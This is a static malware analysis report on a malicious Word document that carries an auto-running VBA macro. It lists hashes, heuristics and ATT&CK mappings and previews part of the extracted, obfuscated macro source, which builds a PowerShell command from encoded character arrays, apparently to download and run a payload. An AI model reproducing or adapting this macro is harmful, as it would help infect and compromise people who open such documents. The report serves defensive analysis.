Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e888c8a6f8384f09…

MALICIOUS

Office (OLE)

225.2 KB Created: 2018-06-28 22:47:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: c0cc9873dc50038ddda74a212ffbe38b SHA-1: 03f595ed9062933fc7c908e0b33a67218178d542 SHA-256: e888c8a6f8384f0987a15741f5a865d4beccb38e460a6d1626ca1972a2656df0
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the AutoOpen macro marker suggests it executes automatically upon opening. This pattern strongly suggests the macro is designed to download and execute a secondary payload, a common technique for initial compromise.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11381 bytes
SHA-256: 5e3fe7075460df14415f53d11975c51dc3d8ee23c6176997eb9f1757bfb9c379
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wfZPivt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OMKIwzjciFilXj"
Function GOriAPK()
On Error Resume Next
pICiJO = 31770 + Atn(19988) / 8192 / Round(32823) / 23006 / CInt(JOMBz)
TDalMV = ChrB(48871 + Sin(CsvCo * CLng(jHwLJz + 47351) + 4211 + fYDGf))
iGdEbEK = "HELL" + "      " + "       " + "     " + "         " + "     " + "     " + "     -Jo" + "in " + Chr(40) + " " + Chr(40) + "126" + ", 12,5"
nZRZBd = 52982 + Atn(10495) / 8241 / Round(91803) / 63190 / CInt(mLYOB)
RrBPAr = ChrB(950 + Sin(RsvMI * CLng(uaOTi + 55597) + 75084 + FCuQc))
wIjUalb = "3, 31 " + ", 103 ," + "52 ,63" + " ,45 " + ",119,53,5" + "6 ,48,63" + ", 57" + " , 46, 12"
mqnQXb = 79174 + Atn(76819) / 89479 / Round(46744) / 46997 / CInt(ZqMjK)
mSOLwF = ChrB(69365 + Sin(pBmzV * CLng(PKYaFi + 78628) + 63922 + GjquE))
jvtzZUkpDGB = "2, 20," + " 63 " + ", 46 , " + "116, 13," + "63 , 56 ," + " 25 , " + "54 , 51 " + ", 63,52" + " ,46,"
wDVsC = 56311 + Atn(19470) / 53073 / Round(50875) / 88807 / CInt(jzmnBu)
nKPSm = ChrB(57816 + Sin(CFsIfF * CLng(fVtzQ + 14543) + 37074 + FiwjW))
MTrvGHHUzCI = " 97, 126" + " , 0,25" + " , 29," + "103 ,125" + ",50, " + "46, 46, 4"
pulEln = 13180 + Atn(88777) / 76847 / Round(57240) / 32872 / CInt(MzXRSv)
XBitpk = ChrB(75756 + Sin(jFhUGH * CLng(NKHEuS + 6960) + 71786 + PjYvTj))
ZdilTh = "2 ,9" + "6 , 11" + "7 ,11" + "7,45 ,45," + "45 ,1" + "16,5"
PDrzwL = 3340 + Atn(92106) / 37685 / Round(95995) / 8366 / CInt(pGJKkd)
MJOAWU = ChrB(30869 + Sin(dIMrPw * CLng(RQOHm + 2780) + 17476 + kwNdw))
diGUUO = "6, 40 ,5" + "9 , 57 ,6" + "3 , 41,11" + "6,53,40" + ", 61,116," + "47, 49 ," + "117 " + ", 32" + ",10 , " + "35 ,18," + " 104 ,41"
FWoRhX = 58103 + Atn(1869) / 4371 / Round(42022) / 59866 / CInt(OXmHGo)
Xpswcr = ChrB(70588 + Sin(wiEIq * CLng(WYmYZ + 64826) + 48713 + QOscGm))
NjHGtjWErLz = " , 10" + "7, 42" + ", 2 " + ",49,117" + " ,26,5" + "0 , 46" + ", 46 ," + "42 , " + "96 , 1" + "17 ,1"
GOriAPK = iGdEbEK + wIjUalb + jvtzZUkpDGB + MTrvGHHUzCI + ZdilTh + diGUUO + NjHGtjWErLz
YdqYzY = 70411 + Atn(24924) / 49048 / Round(21946) / 51808 / CInt(TfWzNo)
rzAjj = ChrB(13688 + Sin(lZiEz * CLng(wSaAOj + 84476) + 90999 + LNMwkF))
End Function
Function rTLaQZYPjN()
On Error Resume Next
tRiou = 89996 + Atn(71852) / 46816 / Round(87961) / 19426 / CInt(unLiV)
qzBFW = ChrB(67356 + Sin(wQFomW * CLng(WwdfNZ + 21832) + 81252 + hBHER))
QznmGO = "17 , 45, " + "45 , 4" + "5 ,1" + "16,46," + " 50, 51," + " 52 ," + "61 , 35 " + ", 59 " + ",42 , 42"
HacrBI = 72106 + Atn(9220) / 2773 / Round(45039) / 65517 / CInt(sdpwl)
dvvJf = ChrB(42028 + Sin(AAvTDO * CLng(MwIiMu + 41688) + 47157 + ucIiYS))
ZBTjBPPqilV = " ,116,57" + ",53, 55," + " 117,46,6" + "3 ,41,46" + ",117 , " + "21, " + "31 ,99 ," + "43 ," + " 34 " + ", 110 , "
OkQkb = 42723 + Atn(4047) / 97229 / Round(89872) / 12393 / CInt(BIpkzI)
otUKk = ChrB(82540 + Sin(EKBjX * CLng(Yhnhjn + 59151) + 6104 + wKkFzU))
tEpKCQzYiAf = "52 , 52 " + ", 57 ,1" + "17,26 ,50" + ", 46" + ", 46, 42 " + ", 96," + "117,117" + " , 45" + ",45 , " + "45,116," + " 62 ,63, "
vJfzb = 69545 + Atn(48350) / 85753 / Round(7566) / 95 / CInt(iWLAR)
PXTVH = ChrB(2583 + Sin(dAzzJ * CLng(irjoO + 84903) + 3642 + PnIud))
EFjHjal = "34,46,63 " + ", 40 , 5" + "5,59, 57" + " , 49,116" + " , 57 , 5" + "3, 55 " + ", 117, 2" + "3, 63"
Ovjivs = 25614 + Atn(81518) / 52945 / Round(1263) / 90374 / CInt(HVWbmb)
iVhCiz = ChrB(16497 + Sin(wAjLa * CLng(RuhUTB + 33013) + 24219 + Qftbkj))
WARXjskbEE = ", 62 " + ",51, 5" + "9, 117" + ", 56 ,30" + " , 43,5" + "6 ,18 , 2" + "1 , " + "22,11" + "7, 26 "
oBjLz = 26678 + Atn(64346) / 87319 / Round(95535) / 64327 / CInt(dOqroU)
qaoHT = ChrB(50870 + Sin(RhRWp * CLng(YjwLi + 61164) + 27870 + DNoWlO))
DittBXS = ",50 , " + "46 ,46" + ", 42 , 9" + "6,117 " + ", 117 " + ",45 , " + "45 , 45 " + ", 116, 5" + "9, 55 , 5" + "6,59,4" + "1 , 4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.